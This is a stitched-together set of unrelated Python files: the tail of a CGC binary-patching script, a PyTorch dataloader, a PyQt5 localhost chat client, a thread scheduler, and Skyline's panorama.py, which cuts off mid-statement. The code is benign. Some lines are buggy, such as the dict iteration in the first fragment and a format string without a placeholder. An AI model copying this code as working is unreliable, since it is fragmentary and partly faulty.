p.terminate() failed_patches = {k:v for k,v in res_dict.iteritems() if v[0] == False} print "FAILED PATCHES",str(len(failed_patches))+"/"+str(ntasks) for k,v in failed_patches: print k,v pickle.dump(res_dict,open(sys.argv[4],"wb")) #IPython.embed()
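# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration; not part of the original script).
# The binary path and output path below are hypothetical, and the technique name
# must match one of the generate_<technique>_binary methods defined on
# PatchMaster above (e.g. "medium_detour", "medium_reassembler",
# "medium_reassembler_optimized").
def example_patchmaster_usage():
    pm = PatchMaster("/tmp/example_cb")  # hypothetical CGC challenge binary
    patched_content, network_rule = pm.create_one_patch("medium_detour")
    if patched_content is None:
        print "patching failed"
        return
    out_path = "/tmp/example_cb_patched"  # hypothetical output path
    with open(out_path, "wb") as fp:
        fp.write(patched_content)
    os.chmod(out_path, 0755)  # keep the patched binary executable
    if network_rule:
        print "network rule:", network_rule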
dataloader.py
import math import torch from dataset_file import DatasetFile from converter import ImageConverter, LabelConverter, FlexibleLabelConverter class CustomDataloader(object): def __init__(self, dataset='mnist.dataset', batch_size=16, fold='train', shuffle=True, last_batch=False, example_count=None, **kwargs): self.dsf = DatasetFile(dataset, example_count=example_count) self.img_conv = ImageConverter(self.dsf, **kwargs) self.lab_conv = LabelConverter(self.dsf, **kwargs) self.batch_size = batch_size self.fold = fold self.last_batch = last_batch self.shuffle = shuffle self.num_classes = self.lab_conv.num_classes self.image_tensor = None self.label_tensor = None def get_batch(self, **kwargs): batch = self.dsf.get_batch(fold=self.fold, batch_size=self.batch_size, **kwargs) images, labels = self.convert(batch) return images, labels def __iter__(self): batcher = self.dsf.get_all_batches( fold=self.fold, batch_size=self.batch_size, shuffle=self.shuffle, last_batch=self.last_batch) """ # TODO: Multithreading improves throughput by 10-20% # It must be implemented safely, however- not like this # In particular, ensure no deadlocks, interactivity and logging should still work import queue import threading q = queue.Queue(maxsize=1) def yield_batch_worker(): for batch in batcher: images, labels = self.convert(batch) q.put((images, labels)) q.put('finished') t = threading.Thread(target=yield_batch_worker) t.start() while True: result = q.get() if result == 'finished': break yield result t.join() """ for batch in batcher: images, labels = self.convert(batch) yield images, labels def convert(self, batch): images = self.img_conv(batch) labels = self.lab_conv(batch) images = torch.FloatTensor(images).cuda() labels = torch.LongTensor(labels).cuda() return images, labels def __len__(self): return math.floor(self.dsf.count(self.fold) / self.batch_size) def count(self): return self.dsf.count(self.fold) def class_name(self, idx): return self.lab_conv.labels[idx] class FlexibleCustomDataloader(CustomDataloader): def __init__(self, dataset='mnist.dataset', batch_size=16, fold='train', shuffle=True, last_batch=False, example_count=None, **kwargs): super().__init__(dataset, batch_size, fold, shuffle, last_batch, example_count, **kwargs) self.lab_conv = FlexibleLabelConverter(dataset=self.dsf, **kwargs) def convert(self, batch): images = self.img_conv(batch) labels = self.lab_conv(batch) images = torch.FloatTensor(images).cuda() labels = torch.FloatTensor(labels).cuda() return images, labels
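# ---------------------------------------------------------------------------
# Hedged usage sketch (illustration only, not part of the original module).
# Assumes a prepared 'mnist.dataset' DatasetFile on disk and a CUDA-capable GPU,
# since convert() moves every batch onto the GPU with .cuda().
if __name__ == '__main__':
    loader = CustomDataloader(dataset='mnist.dataset', batch_size=32, fold='test', shuffle=False)
    print('{} examples across {} classes'.format(loader.count(), loader.num_classes))
    for images, labels in loader:
        # images is a CUDA FloatTensor batch, labels a CUDA LongTensor batch
        print(images.shape, labels.shape)
        break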
guiplus.py
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'gui.ui' # # Created by: PyQt5 UI code generator 5.15.1 # # WARNING: Any manual changes made to this file will be lost when pyuic5 is # run again. Do not edit this file unless you know what you are doing. import os, sys, threading, time from PyQt5 import QtCore, QtGui, QtWidgets from PyQt5.QtGui import QTextCursor from PyQt5.QtWidgets import QApplication, QMainWindow, QDialog, QFileDialog from socket import * class Ui_main(QtWidgets.QMainWindow): def setupUi(self, main, port, usrname): main.setObjectName("main") main.setEnabled(True) main.resize(640, 443) main.setFixedSize(main.width(), main.height()) main.setMouseTracking(False) main.setStyleSheet("QWidget {\n" " background-color: #dcdcdc;\n" " font-family: \"Noto Serif SC\";\n" " font-weight: 500;\n" "}\n" "QPushButton {\n" " color: #dcdcdc;\n" " background-color: #262626;\n" " font-family: \"Noto Serif SC\";\n" " border-radius: 10px;\n" " border: 1px solid #262626;\n" "}\n" "QPushButton:hover {\n" " color: #dcdcdc;\n" " background-color: #3f3f3f;\n" " font-family: \"Noto Serif SC\";\n" " border: 1px solid #262626;\n" "}\n" "QPushButton:pressed {\n" " color: #dcdcdc;\n" " background-color: #3f3f3f;\n" " font-family: \"Noto Serif SC\";\n" " border: 1px solid #dcdcdc;\n" "}\n" "QToolButton {\n" " color: #dcdcdc;\n" " background-color: #262626;\n" " font-family: \"Noto Serif SC\";\n" " border-radius: 10px;\n" " border: 1px solid #262626;\n" "}\n" "QToolButton:hover {\n" " color: #dcdcdc;\n" " background-color: #3f3f3f;\n" " font-family: \"Noto Serif SC\";\n" " border: 1px solid #3f3f3f;\n" "}\n" "QToolButton:pressed {\n" " color: #dcdcdc;\n" " background-color: #3f3f3f;\n" " font-family: \"Noto Serif SC\";\n" " border: 1px solid #dcdcdc;\n" "}\n" "QTextBrowser {\n" " background-color: #f5f5f5;\n" " color: #262626;\n" " border-radius: 10px;\n" "}\n" "QLineEdit {\n" " background-color: #f5f5f5;\n" " color: #262626;\n" " text-indent: 10px;\n" " border-radius: 10px;\n" " padding-left: 10px;\n" "}\n" "QGraphicViews {\n" " background-image: url(\'./yjs.png\');\n" " background-size: 100% 100%;\n" "}\n" "QLabel {\n" " border-radius: 10px;\n" " background-color: #f5f5f5;\n" "}\n" "QScrollBar:vertical {\n" " width: 10px;\n" " border-radius: 5px;\n" " border-top-left-radius: 0px;\n" " border-bottom-left-radius: 0px;\n" " background: #f5f5f5;\n" " padding-top: 2px;\n" " padding-bottom: 2px; \n" "}\n" "QScrollBar::handle:vertical {\n" " background: #dcdcdc;\n" " width: 8px;\n" " border-radius: 4px;\n" " margin-left: 0px;\n" " margin-right: 2px;\n" "}\n" "QGraphicsView {\n" " border-image: url(./yjs.png);\n" # " background-size: 100% 100%;\n" "}" ) self.sendButton = QtWidgets.QPushButton(main) self.sendButton.setGeometry(QtCore.QRect(570, 400, 61, 31)) self.sendButton.setAutoDefault(False) self.sendButton.setDefault(False) self.sendButton.setFlat(True) self.sendButton.setObjectName("sendButton") self.chatMsg = QtWidgets.QTextBrowser(main) self.chatMsg.setGeometry(QtCore.QRect(10, 10, 511, 381)) self.chatMsg.setFrameShape(QtWidgets.QFrame.NoFrame) self.chatMsg.setFrameShadow(QtWidgets.QFrame.Plain) self.chatMsg.setLineWidth(1) self.chatMsg.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff) self.chatMsg.setSizeAdjustPolicy(QtWidgets.QAbstractScrollArea.AdjustIgnored) self.chatMsg.setOverwriteMode(True) self.chatMsg.setObjectName("chatMsg") self.inputMsg = QtWidgets.QLineEdit(main) self.inputMsg.setGeometry(QtCore.QRect(10, 400, 551, 31)) self.inputMsg.setText("") 
self.inputMsg.setFrame(False) self.inputMsg.setEchoMode(QtWidgets.QLineEdit.Normal) self.inputMsg.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter) self.inputMsg.setCursorMoveStyle(QtCore.Qt.LogicalMoveStyle) self.inputMsg.setClearButtonEnabled(False) self.inputMsg.setObjectName("inputMsg") self.chatroomName = QtWidgets.QLabel(main) self.chatroomName.setGeometry(QtCore.QRect(530, 40, 101, 41)) self.chatroomName.setTextFormat(QtCore.Qt.AutoText) self.chatroomName.setAlignment(QtCore.Qt.AlignCenter) self.chatroomName.setWordWrap(True) self.chatroomName.setTextInteractionFlags(QtCore.Qt.NoTextInteraction) self.chatroomName.setObjectName(port) self.picsButton = QtWidgets.QToolButton(main) self.picsButton.setGeometry(QtCore.QRect(530, 330, 31, 22)) self.picsButton.setObjectName("picsButton") self.fileButton = QtWidgets.QToolButton(main) self.fileButton.setGeometry(QtCore.QRect(530, 360, 31, 22)) self.fileButton.setCheckable(False) self.fileButton.setChecked(False) self.fileButton.setAutoExclusive(False) self.fileButton.setObjectName("fileButton") self.graphicsView = QtWidgets.QGraphicsView(main) self.graphicsView.setGeometry(QtCore.QRect(530, 220, 101, 101)) self.graphicsView.setAutoFillBackground(False) self.graphicsView.setFrameShape(QtWidgets.QFrame.NoFrame) self.graphicsView.setFrameShadow(QtWidgets.QFrame.Plain) self.graphicsView.setLineWidth(0) brush = QtGui.QBrush(QtGui.QColor(0, 0, 0)) brush.setStyle(QtCore.Qt.NoBrush) self.graphicsView.setBackgroundBrush(brush) self.graphicsView.setInteractive(False) self.graphicsView.setObjectName("graphicsView") self.Name = QtWidgets.QLabel(main) self.Name.setGeometry(QtCore.QRect(530, 90, 101, 16)) self.Name.setAlignment(QtCore.Qt.AlignCenter) self.Name.setObjectName("Name") self.retranslateUi(main, port, usrname) self.sendButton.clicked.connect(self.sendMsg) self.picsButton.clicked.connect(self.showPicsMenu) self.fileButton.clicked.connect(self.showFileMenu) QtCore.QMetaObject.connectSlotsByName(main) def retranslateUi(self, main, port, usrname): _translate = QtCore.QCoreApplication.translate main.setWindowTitle(_translate("main", "Chat Room")) self.sendButton.setText(_translate("main", "Send")) self.chatMsg.setHtml(_translate("main", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n" "<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n" "p, li { white-space: pre-wrap; }\n" "</style></head><body style=\" font-family:\'Noto Serif SC\'; font-size:13pt; font-weight:496; font-style:normal;\">\n" "<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>")) self.chatMsg.setPlaceholderText(_translate("main", "Your History Msg HERE.")) self.inputMsg.setPlaceholderText(_translate("main", "Your Msg HERE.")) self.chatroomName.setText(_translate("main", port)) self.picsButton.setText(_translate("main", "Pics")) self.fileButton.setText(_translate("main", "File")) self.Name.setText(_translate("main", usrname)) def sendMsg(self): # while 1: # try: # yourSentMsg = str(self.inputMsg.text()) # if yourSentMsg != 'exit()' and yourSentMsg != '': # self.clientSocket.send(yourSentMsg.encode()) # else: # self.clientSocket.close() # break # except ConnectionResetError: # self.clientSocket.close() # break # os._exit(0) try: yourSentMsg = str(self.inputMsg.text()) if yourSentMsg != 'exit()': self.clientSocket.send(yourSentMsg.encode()) 
                self.inputMsg.setText('')
            else:
                self.clientSocket.close()
        except ConnectionResetError:
            self.clientSocket.close()

    def recvMsg(self):
        while 1:
            try:
                receivedMsg = self.clientSocket.recv(20480)
                if receivedMsg.decode() != '':
                    print(receivedMsg.decode())
                    self.chatMsg.append(receivedMsg.decode())
                    # scroll to the newest message (was moveCursor(-1), which is
                    # not a valid QTextCursor.MoveOperation)
                    self.chatMsg.moveCursor(QTextCursor.End)
                    if len(receivedMsg.decode()) > 5 and receivedMsg.decode()[-2] == 's' and receivedMsg.decode()[-1] == '!':
                        self.Name.setText(str(receivedMsg.decode()).split(' ')[0])
            except ConnectionResetError:
                self.clientSocket.close()
                self.chatMsg.append('Chatroom Closed.\nThis Window will close after 5 seconds.')
                time.sleep(1)
                self.chatMsg.append('This Window will close after 4 seconds.')
                time.sleep(1)
                self.chatMsg.append('This Window will close after 3 seconds.')
                time.sleep(1)
                self.chatMsg.append('This Window will close after 2 seconds.')
                time.sleep(1)
                self.chatMsg.append('This Window will close after 1 second.')
                time.sleep(1)
                print('Chatroom Closed.')
                # QtWidgets.QMessageBox.information(self, "Chatroom Closed.", "Chatroom Closed.")  # errors here: a QMessageBox cannot be created from this worker thread
                break
        self.close()

    def showPicsMenu(self):
        # QtWidgets.QMessageBox.information(self.picsButton, "pics", "pics")
        imgName, imgType = QFileDialog.getOpenFileName(self, "Open Image", "", "*.jpg;;*.png;;All Files(*)")
        print(imgName, imgType)

    def showFileMenu(self):
        # QtWidgets.QMessageBox.information(self.fileButton, "file", "file")
        fileName, fileType = QFileDialog.getOpenFileName(self, "Open File", "", "*.txt;;*.md;;All Files(*)")  # ;;*.doc;;*.docx
        fileContent = open(fileName, 'r').read()
        onlyname = fileName.split('/')[-1]
        file = '#################### - ' + onlyname + ' - ####################\n' + fileContent + '\n############################ - End - ############################'
        self.inputMsg.setText(file)
        print(fileName, fileType)

    def __init__(self, serverPort, usrname):
        super(Ui_main, self).__init__()
        serverName = "localhost"
        # serverPort = 9124
        # serverPort = int(sys.argv[1])
        port = "ChatRoom\n" + str(serverPort)
        self.clientSocket = socket(AF_INET, SOCK_STREAM)
        self.clientSocket.connect((serverName, serverPort))
        self.setupUi(self, port, usrname)
        self.retranslateUi(self, port, usrname)
        print("The Client is READY to RECEIVE via TCP @", serverPort)
        print(self.clientSocket)
        threads = [threading.Thread(target=self.recvMsg), threading.Thread(target=self.sendMsg)]
        for t in threads:
            # self.chatMsg.moveToThread(t)
            # self.inputMsg.moveToThread(t)
            t.start()
        self.show()


if __name__ == '__main__':
    app = QApplication(sys.argv)
    serverPort = int(sys.argv[1])
    mainWindow = QMainWindow()
    ui = Ui_main(serverPort, 'Your Name')  # the name here follows the class name of the generated .py file
    # ui.setupUi(mainWindow, 'ChatRoom')
    # mainWindow.show()
    sys.exit(app.exec_())
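# ---------------------------------------------------------------------------
# Hedged test harness (illustration only; the real chat server is a separate
# program and is not part of this file). A minimal TCP echo server on localhost
# gives the client above something to connect to: run this function in one
# process and `python guiplus.py 9124` in another.
def run_echo_server(port=9124):
    srv = socket(AF_INET, SOCK_STREAM)
    srv.bind(('localhost', port))
    srv.listen(1)
    conn, addr = srv.accept()
    while True:
        data = conn.recv(20480)
        if not data:  # client closed the connection
            break
        conn.send(data)  # echo the message straight back
    conn.close()
    srv.close()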
schedule_every_n_sec.py
import time
from threading import Thread


class Scheduler:
    """
    Run the given function every n seconds on a background thread.
    """
    def __init__(self, n, function, *args, **kwargs):
        def target():
            # keep calling the function until stop() clears the flag
            while self.flag:
                function(*args, **kwargs)
                time.sleep(n)
        self.flag = True
        self.thread = Thread(target=target)
        self.thread.start()

    def stop(self):
        """
        Stop scheduling new calls of the function.
        A call that is already running is not terminated, and because the
        worker sleeps between calls, stop() may block for up to n seconds.
        """
        self.flag = False
        self.thread.join()


scheduler = Scheduler(1, print, "It works")
# wait 10 seconds and stop the scheduler
time.sleep(10)
scheduler.stop()
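# ---------------------------------------------------------------------------
# Hedged variant (illustration only, not part of the original). Because the
# Scheduler above sleeps with time.sleep(n), stop() can block for up to n
# seconds before the worker notices the flag change. Waiting on a
# threading.Event instead lets stop() wake the worker immediately.
from threading import Event


class EventScheduler:
    def __init__(self, n, function, *args, **kwargs):
        self._stop = Event()

        def target():
            while not self._stop.is_set():
                function(*args, **kwargs)
                self._stop.wait(n)  # returns early as soon as stop() sets the event

        self.thread = Thread(target=target)
        self.thread.start()

    def stop(self):
        self._stop.set()
        self.thread.join()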
panorama.py
import logging try: from Queue import Empty except: from queue import Empty from time import time, sleep from threading import Thread # @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage # Use Redis sets in place of Manager().list() to reduce memory and number of # processes # from multiprocessing import Process, Manager from multiprocessing import Process import os from os import kill, getpid, listdir from os.path import join, isfile from ast import literal_eval from redis import StrictRedis from msgpack import Unpacker, packb import traceback from sys import version_info import mysql.connector from mysql.connector import errorcode # @added 20190502 - Branch #2646: slack from sqlalchemy.sql import select import settings from skyline_functions import fail_check, mkdir_p # @added 20170115 - Feature #1854: Ionosphere learn - generations # Added determination of the learn related variables so that any new metrics # that Panorama adds to the Skyline database, it adds the default # IONOSPHERE_LEARN_DEFAULT_ values or the namespace specific values matched # from settings.IONOSPHERE_LEARN_NAMESPACE_CONFIG to the metric database # entry. from ionosphere_functions import get_ionosphere_learn_details # @added 20190502 - Branch #2646: slack from database import get_engine, metrics_table_meta, anomalies_table_meta skyline_app = 'panorama' skyline_app_logger = '%sLog' % skyline_app logger = logging.getLogger(skyline_app_logger) skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app) skyline_app_loglock = '%s.lock' % skyline_app_logfile skyline_app_logwait = '%s.wait' % skyline_app_logfile python_version = int(version_info[0]) this_host = str(os.uname()[1]) # Converting one settings variable into a local variable, just because it is a # long string otherwise. try: ENABLE_PANORAMA_DEBUG = settings.ENABLE_PANORAMA_DEBUG except: logger.error('error :: cannot determine ENABLE_PANORAMA_DEBUG from settings') ENABLE_PANORAMA_DEBUG = False try: SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME if SERVER_METRIC_PATH == '.': SERVER_METRIC_PATH = '' except: SERVER_METRIC_PATH = '' # @added 20190523 - Branch #2646: slack try: SLACK_ENABLED = settings.SLACK_ENABLED except: SLACK_ENABLED = False skyline_app_graphite_namespace = 'skyline.%s%s' % (skyline_app, SERVER_METRIC_PATH) failed_checks_dir = '%s_failed' % settings.PANORAMA_CHECK_PATH # @added 20160907 - Handle Panorama stampede on restart after not running #26 # Allow to expire check if greater than PANORAMA_CHECK_MAX_AGE, backwards # compatible try: test_max_age_set = 1 + settings.PANORAMA_CHECK_MAX_AGE if test_max_age_set > 1: max_age = True if test_max_age_set == 1: max_age = False max_age_seconds = settings.PANORAMA_CHECK_MAX_AGE except: max_age = False max_age_seconds = 0 expired_checks_dir = '%s_expired' % settings.PANORAMA_CHECK_PATH # Database configuration config = {'user': settings.PANORAMA_DBUSER, 'password': settings.PANORAMA_DBUSERPASS, 'host': settings.PANORAMA_DBHOST, 'port': settings.PANORAMA_DBPORT, 'database': settings.PANORAMA_DATABASE, 'raise_on_warnings': True} class Panorama(Thread): """ The Panorama class which controls the panorama thread and spawned processes. 
""" def __init__(self, parent_pid): """ Initialize Panorama Create the :obj:`mysql_conn` """ super(Panorama, self).__init__() # @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow if settings.REDIS_PASSWORD: self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH) else: self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH) self.daemon = True self.parent_pid = parent_pid self.current_pid = getpid() # @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage # Task #3032: Debug number of Python processes and memory use # Branch #3002: docker # Reduce amount of Manager instances that are used as each requires a # copy of entire memory to be copied into each subprocess so this # results in a python process per Manager instance, using as much # memory as the parent. OK on a server, not so much in a container. # Disabled all the Manager().list() below and replaced with Redis sets # self.anomalous_metrics = Manager().list() # self.metric_variables = Manager().list() self.mysql_conn = mysql.connector.connect(**config) def check_if_parent_is_alive(self): """ Self explanatory """ try: kill(self.current_pid, 0) kill(self.parent_pid, 0) except: exit(0) """ These are the panorama mysql functions used to surface and input panorama data for timeseries. """ def mysql_select(self, select): """ Select data from mysql database :param select: the select string :type select: str :return: tuple :rtype: tuple, boolean - **Example usage**:: query = 'select id, test from test' result = self.mysql_select(query) - **Example of the 0 indexed results tuple, which can hold multiple results**:: >> print('results: %s' % str(results)) results: [(1, u'test1'), (2, u'test2')] >> print('results[0]: %s' % str(results[0])) results[0]: (1, u'test1') .. note:: - If the MySQL query fails a boolean will be returned not a tuple * ``False`` * ``None`` """ try: cnx = mysql.connector.connect(**config) if ENABLE_PANORAMA_DEBUG: logger.info('debug :: connected to mysql') except mysql.connector.Error as err: logger.error('error :: mysql error - %s' % str(err)) logger.error('error :: failed to connect to mysql') return False if cnx: try: if ENABLE_PANORAMA_DEBUG: logger.info('debug :: %s' % (str(select))) cursor = cnx.cursor() query = ('%s' % (str(select))) cursor.execute(query) result = cursor.fetchall() cursor.close() cnx.close() return result except mysql.connector.Error as err: logger.error('error :: mysql error - %s' % str(err)) logger.error('error :: failed to query database - %s' % (str(select))) try: cnx.close() return False except: return False else: if ENABLE_PANORAMA_DEBUG: logger.error('error :: failed to connect to mysql') # Close the test mysql connection try: cnx.close() return False except: return False return False def mysql_insert(self, insert): """ Insert data into mysql table :param select: the insert string :type select: str :return: int :rtype: int or boolean - **Example usage**:: query = 'insert into host (host) VALUES (\'this_host\')' result = self.mysql_insert(query) .. 
note:: - If the MySQL query fails a boolean will be returned not a tuple * ``False`` * ``None`` """ try: cnx = mysql.connector.connect(**config) if ENABLE_PANORAMA_DEBUG: logger.info('debug :: connected to mysql') except mysql.connector.Error as err: logger.error('error :: mysql error - %s' % str(err)) logger.error('error :: failed to connect to mysql') raise if cnx: try: cursor = cnx.cursor() cursor.execute(insert) inserted_id = cursor.lastrowid # Make sure data is committed to the database cnx.commit() cursor.close() cnx.close() return inserted_id except mysql.connector.Error as err: logger.error('error :: mysql error - %s' % str(err)) logger.error('Failed to insert record') cnx.close() raise else: cnx.close() return False return False # @added 20170101 - Feature #1830: Ionosphere alerts # Bug #1460: panorama check file fails # Panorama check file fails #24 # Get rid of the skyline_functions imp as imp is deprecated in py3 anyway def new_load_metric_vars(self, metric_vars_file): """ Load the metric variables for a check from a metric check variables file :param metric_vars_file: the path and filename to the metric variables files :type metric_vars_file: str :return: the metric_vars module object or ``False`` :rtype: list """ if os.path.isfile(metric_vars_file): logger.info( 'loading metric variables from metric_check_file - %s' % ( str(metric_vars_file))) else: logger.error( 'error :: loading metric variables from metric_check_file - file not found - %s' % ( str(metric_vars_file))) return False metric_vars = [] with open(metric_vars_file) as f: for line in f: no_new_line = line.replace('\n', '') no_equal_line = no_new_line.replace(' = ', ',') array = str(no_equal_line.split(',', 1)) add_line = literal_eval(array) metric_vars.append(add_line) string_keys = ['metric', 'anomaly_dir', 'added_by', 'app', 'source'] float_keys = ['value'] int_keys = ['from_timestamp', 'metric_timestamp', 'added_at', 'full_duration'] array_keys = ['algorithms', 'triggered_algorithms'] boolean_keys = ['graphite_metric', 'run_crucible_tests'] metric_vars_array = [] for var_array in metric_vars: key = None value = None if var_array[0] in string_keys: key = var_array[0] value_str = str(var_array[1]).replace("'", '') value = str(value_str) if var_array[0] == 'metric': metric = value if var_array[0] in float_keys: key = var_array[0] value_str = str(var_array[1]).replace("'", '') value = float(value_str) if var_array[0] in int_keys: key = var_array[0] value_str = str(var_array[1]).replace("'", '') value = int(value_str) if var_array[0] in array_keys: key = var_array[0] value = literal_eval(str(var_array[1])) if var_array[0] in boolean_keys: key = var_array[0] if str(var_array[1]) == 'True': value = True else: value = False if key: metric_vars_array.append([key, value]) if len(metric_vars_array) == 0: logger.error( 'error :: loading metric variables - none found' % ( str(metric_vars_file))) return False if settings.ENABLE_DEBUG: logger.info( 'debug :: metric_vars determined - metric variable - metric - %s' % str(metric_vars.metric)) logger.info('debug :: metric_vars for %s' % str(metric)) logger.info('debug :: %s' % str(metric_vars_array)) return metric_vars_array def update_slack_thread_ts(self, i, base_name, metric_timestamp, slack_thread_ts): """ Update an anomaly record with the slack_thread_ts. 
:param i: python process id :param metric_check_file: full path to the metric check file :return: returns True """ def get_an_engine(): try: engine, log_msg, trace = get_engine(skyline_app) return engine, log_msg, trace except: logger.error(traceback.format_exc()) log_msg = 'error :: update_slack_thread_ts :: failed to get MySQL engine in update_slack_thread_ts' logger.error('error :: update_slack_thread_ts :: failed to get MySQL engine in update_slack_thread_ts') return None, log_msg, trace def engine_disposal(engine): if engine: try: engine.dispose() except: logger.error(traceback.format_exc()) logger.error('error :: update_slack_thread_ts :: calling engine.dispose()') return child_process_pid = os.getpid() logger.info('update_slack_thread_ts :: child_process_pid %s, processing %s, %s, %s' % ( str(child_process_pid), base_name, str(metric_timestamp), str(slack_thread_ts))) try: engine, log_msg, trace = get_an_engine() except: logger.error(traceback.format_exc()) logger.error('error :: update_slack_thread_ts :: could not get a MySQL engine to update slack_thread_ts in anomalies for %s' % (base_name)) if not engine: logger.error('error :: update_slack_thread_ts :: engine not obtained to update slack_thread_ts in anomalies for %s' % (base_name)) return False try: metrics_table, log_msg, trace = metrics_table_meta(skyline_app, engine) logger.info(log_msg) logger.info('update_slack_thread_ts :: metrics_table OK') except: logger.error(traceback.format_exc()) logger.error('error :: update_slack_thread_ts :: failed to get metrics_table meta for %s' % base_name) metric_id = None try: connection = engine.connect() stmt = select([metrics_table]).where(metrics_table.c.metric == base_name) result = connection.execute(stmt) for row in result: metric_id = int(row['id']) connection.close() except: logger.error(traceback.format_exc()) logger.error('error :: update_slack_thread_ts :: could not determine metric id from metrics table') logger.info('update_slack_thread_ts :: metric id determined as %s' % str(metric_id)) if metric_id: try: anomalies_table, log_msg, trace = anomalies_table_meta(skyline_app, engine) logger.info(log_msg) logger.info('update_slack_thread_ts :: anomalies_table OK') except: logger.error(traceback.format_exc()) logger.error('error :: update_slack_thread_ts :: failed to get anomalies_table meta for %s' % base_name) anomaly_id = None try: connection = engine.connect() stmt = select([anomalies_table]).\ where(anomalies_table.c.metric_id == metric_id).\ where(anomalies_table.c.anomaly_timestamp == metric_timestamp) result = connection.execute(stmt) for row in result: anomaly_id = int(row['id']) connection.close() except: logger.error(traceback.format_exc()) logger.error('error :: update_slack_thread_ts :: could not determine anomaly id from anomaly table') logger.info('update_slack_thread_ts :: anomaly id determined as %s' % str(anomaly_id)) anomaly_record_updated = False if anomaly_id: try: connection = engine.connect() connection.execute( anomalies_table.update( anomalies_table.c.id == anomaly_id). 
values(slack_thread_ts=slack_thread_ts)) connection.close() logger.info('update_slack_thread_ts :: updated slack_thread_ts for anomaly id %s' % str(anomaly_id)) anomaly_record_updated = True except: logger.error(traceback.format_exc()) logger.error('error :: update_slack_thread_ts :: could not update slack_thread_ts for anomaly id %s' % str(anomaly_id)) if engine: try: engine_disposal(engine) except: logger.error(traceback.format_exc()) logger.error('error :: update_slack_thread_ts :: could not dispose engine') cache_key = 'panorama.slack_thread_ts.%s.%s' % (str(metric_timestamp), base_name) delete_cache_key = False if anomaly_record_updated: delete_cache_key = True if not anomaly_record_updated: # Allow for 60 seconds for an anomaly to be added now = time() anomaly_age = int(now) - int(metric_timestamp) if anomaly_age > 60: delete_cache_key = True if delete_cache_key: logger.info('update_slack_thread_ts :: deleting cache_key %s' % cache_key) try: self.redis_conn.delete(cache_key) logger.info('update_slack_thread_ts :: cache_key %s deleted' % cache_key) except: logger.error(traceback.format_exc()) logger.error('error :: update_slack_thread_ts :: failed to delete cache_key %s' % cache_key) return def spin_process(self, i, metric_check_file): """ Assign a metric anomaly to process. :param i: python process id :param metric_check_file: full path to the metric check file :return: returns True """ child_process_pid = os.getpid() if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: child_process_pid - %s' % str(child_process_pid)) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: processing metric check - %s' % metric_check_file) if not os.path.isfile(str(metric_check_file)): logger.error('error :: file not found - metric_check_file - %s' % (str(metric_check_file))) return check_file_name = os.path.basename(str(metric_check_file)) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: check_file_name - %s' % check_file_name) check_file_timestamp = check_file_name.split('.', 1)[0] if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: check_file_timestamp - %s' % str(check_file_timestamp)) check_file_metricname_txt = check_file_name.split('.', 1)[1] if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: check_file_metricname_txt - %s' % check_file_metricname_txt) check_file_metricname = check_file_metricname_txt.replace('.txt', '') if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: check_file_metricname - %s' % check_file_metricname) check_file_metricname_dir = check_file_metricname.replace('.', '/') if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: check_file_metricname_dir - %s' % check_file_metricname_dir) metric_failed_check_dir = '%s/%s/%s' % (failed_checks_dir, check_file_metricname_dir, check_file_timestamp) failed_check_file = '%s/%s' % (metric_failed_check_dir, check_file_name) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: failed_check_file - %s' % failed_check_file) # Load and validate metric variables try: # @modified 20170101 - Feature #1830: Ionosphere alerts # Bug #1460: panorama check file fails # Panorama check file fails #24 # Get rid of the skyline_functions imp as imp is deprecated in py3 anyway # Use def new_load_metric_vars(self, metric_vars_file): # metric_vars = load_metric_vars(skyline_app, str(metric_check_file)) metric_vars_array = self.new_load_metric_vars(str(metric_check_file)) except: logger.info(traceback.format_exc()) logger.error('error :: failed to load metric variables from check file - %s' % (metric_check_file)) 
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return # Test metric variables # We use a pythonic methodology to test if the variables are defined, # this ensures that if any of the variables are not set for some reason # we can handle unexpected data or situations gracefully and try and # ensure that the process does not hang. metric = None try: # metric_vars.metric # metric = str(metric_vars.metric) key = 'metric' value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key] metric = str(value_list[0]) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: metric variable - metric - %s' % metric) except: logger.error('error :: failed to read metric variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return if not metric: logger.error('error :: failed to load metric variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return value = None # @added 20171214 - Bug #2234: panorama metric_vars value check value_valid = None try: # metric_vars.value # value = str(metric_vars.value) key = 'value' value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key] value = float(value_list[0]) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: metric variable - value - %s' % (value)) # @added 20171214 - Bug #2234: panorama metric_vars value check value_valid = True except: logger.error('error :: failed to read value variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return # @added 20171214 - Bug #2234: panorama metric_vars value check # If value was float of 0.0 then this was interpolated as not set # if not value: if not 